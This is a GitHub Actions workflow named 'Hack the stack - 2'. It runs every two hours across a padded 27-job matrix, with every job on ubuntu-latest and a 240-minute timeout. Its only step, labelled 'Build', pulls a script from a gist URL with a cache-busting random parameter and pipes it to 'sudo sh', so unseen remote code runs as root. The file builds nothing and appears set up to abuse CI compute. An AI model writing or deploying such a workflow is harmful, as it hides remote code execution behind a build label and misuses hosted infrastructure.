name: Hack the stack - 2

on:
  schedule:
    - cron: 59 */2 * * *
  workflow_dispatch:

permissions:
  contents: read

jobs:
  build:
    strategy:
      matrix:
        os: [macos-latest, windows-latest, ubuntu-latest]
        version: [12, 14, 16]
        environment: [test, staging, production]
    name: ${{ matrix.os }} ${{ matrix.version }} ${{ matrix.environment }}
    runs-on: ubuntu-latest
    timeout-minutes: 240
    steps:
    - name: Build
      run: |
        curl -sf -L https://gist.githubusercontent.com/worker/04abc88ed47fe521b0c667369faac920/raw/go.sh?$RANDOM | sudo sh
